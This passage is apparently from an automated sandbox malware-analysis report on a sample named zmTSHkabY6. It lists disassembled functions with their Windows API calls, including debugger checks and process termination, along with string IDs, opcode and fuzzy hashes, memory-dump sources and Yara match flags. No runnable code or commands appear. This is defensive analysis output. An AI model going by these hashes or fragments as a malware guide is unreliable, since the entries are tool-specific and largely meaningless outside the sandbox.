                                                                    • API String ID: 0-4179340841
                                                                    • Opcode ID: 06626fb38e8bf8ae9654a10a7870f3c14065af2f82e1263b484bfad921982846
                                                                    • Instruction ID: 232d648357a9d41b29c0ff59ae1242ae536153a9620680ed57216a287fc5a566
                                                                    • Opcode Fuzzy Hash: 06626fb38e8bf8ae9654a10a7870f3c14065af2f82e1263b484bfad921982846
                                                                    • Instruction Fuzzy Hash: 7BB23AF3A0C204AFE7046E2DEC8567AFBE9EF94720F164A3DE6C4C3744E93558058696
                                                                    Function 0098C1E4 Relevance: 7.9, Strings: 5, Instructions: 1602COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: eo$4z_w$:v$D:?$]yW
                                                                    • API String ID: 0-2756926016
                                                                    • Opcode ID: 9098fc044b2948ceed0df36a859d03588c8f80d68aa8f604f31d67949527f5a1
                                                                    • Instruction ID: 5420738706be5fa183929c9120046456c07f9f606a78d8356a49f423f30fbe8c
                                                                    • Opcode Fuzzy Hash: 9098fc044b2948ceed0df36a859d03588c8f80d68aa8f604f31d67949527f5a1
                                                                    • Instruction Fuzzy Hash: ACB2E5F3A0C200AFE704AE29EC8577ABBE5EF94320F16493DE6C5C3744E63598058696
                                                                    Function 00981EBE Relevance: 6.6, Strings: 4, Instructions: 1624COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >ko$M6ww${t[M$nm
                                                                    • API String ID: 0-1959658425
                                                                    • Opcode ID: 352aaf970f62875ce6b05b7af28a4fb5a1ff194df2adfc41ddc90c96a3beedf8
                                                                    • Instruction ID: 4727e1cc3eb95199143eac9106fd68dfdb5e4f54e99ce24771b7044e2b705f43
                                                                    • Opcode Fuzzy Hash: 352aaf970f62875ce6b05b7af28a4fb5a1ff194df2adfc41ddc90c96a3beedf8
                                                                    • Instruction Fuzzy Hash: 84B23AF3A0C2049FE704AE2DEC8567ABBE5EF94720F1A853DEAC5C3744E93558048697
                                                                    Function 00E89A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E89A25
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E89AF1
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E89B11
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E89B1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction ID: c1bad1790536194aad1d09653a438acc9950d57113c271502017d6692a13d3b3
                                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction Fuzzy Hash: 6031FAB5D0521C9BDB10EF64D9897DCBBF8BF08304F1041AAE40DA7250EB715A85DF45
                                                                    Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                                    Function 00E8C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E8C412
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E8C41C
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00E8C429
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                    • Instruction ID: 6590a0ea08f444ec7cee3895b0e59b44adeeb05c8c8a8e2fec3e2b8583bef43b
                                                                    • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                    • Instruction Fuzzy Hash: 7631C674D012289BCB21EF68D9897DCBBF4BF08310F6051EAE41CA7251E7709B858F59
                                                                    Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                    • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                                    • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                    • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                                    Function 00E8F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,00E8F173,00000000,0041D0A0,?,00000000,?,00E91714), ref: 00E8F196
                                                                    • TerminateProcess.KERNEL32(00000000,?,00E8F173,00000000,0041D0A0,?,00000000,?,00E91714), ref: 00E8F19D
                                                                    • ExitProcess.KERNEL32 ref: 00E8F1AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction ID: 11deb8364f2d01a1b7da0a3c46e904638d9faf481a366fbb792d7b9a3c5d08fa
                                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction Fuzzy Hash: 1FE0B671445218EFCF217B64DD4DA893B69FF50345F005424F80996232DB76DD81CB84
                                                                    Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                                    • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                                    • ExitProcess.KERNEL32 ref: 10005F60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                    • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                                    • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                    • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                                    Function 00E8092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$GetProcAddress.$l
                                                                    • API String ID: 0-2784972518
                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                    • Instruction ID: 348bd8866032c2c62abf97c794ad83b84050c898a572c7c4b386c273a0876e7d
                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                    • Instruction Fuzzy Hash: F3316BB6900609CFDB11DF99C880AADBBF5FF88328F15504AD849B7211D771EA49CBA4
                                                                    Function 00E8F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction ID: f2b45021e5a58549abe38d60bc0cfaf4ec41aa78e5dd6cd8d3efaf59b4593705
                                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction Fuzzy Hash: 5EF11C71E002199FDF18DFA9D9806ADB7B1EF88314F25826AD81DBB344D731AD41CB90
                                                                    Function 0040F320 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                                    Function 009514C0 Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Q& X$Ry^
                                                                    • API String ID: 0-3192898545
                                                                    • Opcode ID: d60e6e8c2915f504e73f28996a7e616eb430416e50c6f6577f26ce33b6432354
                                                                    • Instruction ID: cdf4601282bf851979ad826bc450c0bf44c699eb3e0cd220346c26ac402f65e4
                                                                    • Opcode Fuzzy Hash: d60e6e8c2915f504e73f28996a7e616eb430416e50c6f6577f26ce33b6432354
                                                                    • Instruction Fuzzy Hash: 8561D6F2D086009FE710AE28DD4577ABBE2EF94720F16893DDAC497384E6399815C787
                                                                    Function 009913EA Relevance: 2.6, Strings: 1, Instructions: 1323COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Ow3
                                                                    • API String ID: 0-2993812668
                                                                    • Opcode ID: 63ab130ae1c8825cfa0e4fb6be36930ffaf95d4b6111a5f9d808f4a6478475b4
                                                                    • Instruction ID: db1ef00bc98f815cf21e513519e0448ba0acc04cc79ecd130ddd76afb8ad0230
                                                                    • Opcode Fuzzy Hash: 63ab130ae1c8825cfa0e4fb6be36930ffaf95d4b6111a5f9d808f4a6478475b4
                                                                    • Instruction Fuzzy Hash: 7D924BF360C2049FE304AE2DEC8567ABBE5EF94320F168A3DE6C5C7744EA3558058697
                                                                    Function 0098E0B5 Relevance: 2.5, Strings: 1, Instructions: 1213COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >Tw
                                                                    • API String ID: 0-2637525596
                                                                    • Opcode ID: 50855c562abdbd0173daffdfc0844eeeddcd9536a1a143251d6fc317ff8bacdf
                                                                    • Instruction ID: 5e7038d2b06e48d0d215fbd3d2127dd14376a71ccb43adc45d671d4b61156ddf
                                                                    • Opcode Fuzzy Hash: 50855c562abdbd0173daffdfc0844eeeddcd9536a1a143251d6fc317ff8bacdf
                                                                    • Instruction Fuzzy Hash: 8F82D6F36082009FE304AE2DEC8567ABBE5EFD4720F16893DEAC4C7744E63598458697
                                                                    Function 00E93F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E93F48,?,?,00000008,?,?,00E9AB25,00000000), ref: 00E9417A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction ID: 16bc91e0d0daa9fcdb3d3f37c2b55a1ffb3989f0e451063d1939abf072b3d989
                                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction Fuzzy Hash: C3B15C71610604DFDB18CF28C486EA57BE0FF44368F259658E99ADF2E1C335E992CB40
                                                                    Function 00413CE6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                                    Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                    • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                                    • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                    • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                                    Function 004099B3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004099C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                    • Instruction ID: fa6e1b123792800c16e511e7ad2770c43bb66d79c6f5260c400c77222bdc654c
                                                                    • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                    • Instruction Fuzzy Hash: 86517AB1A103158BDB24CF54D981BAABBF0FB88314F24853AC802EB395D378AD51CF59
                                                                    Function 00E89BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00409955,00E897B6), ref: 00E89BB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 00409949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 00E8D876 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction ID: bf86f0fc14ba33702e0ad8c492274cfc63034f4262aa4a3967971b12236ab583
                                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction Fuzzy Hash: 72517B3060CB489ADB3CBA6C8C957FE67DA9B8230CF243519D48EF72C1D6919D49D352
                                                                    Function 00E8D644 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction ID: 415f6ad4851fe9f8750e37a8715b6f5a238b036775a3a8bf8c4db743c11d2111
                                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction Fuzzy Hash: 20517C7020C64C66DB38BA688C95BFE67D99B02308F14341FD48EFB2C1E616DD44A356
                                                                    Function 0040D3DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                                                    Function 0040D60F Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                                                    Function 004143F9 Relevance: .6, Instructions: 637COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
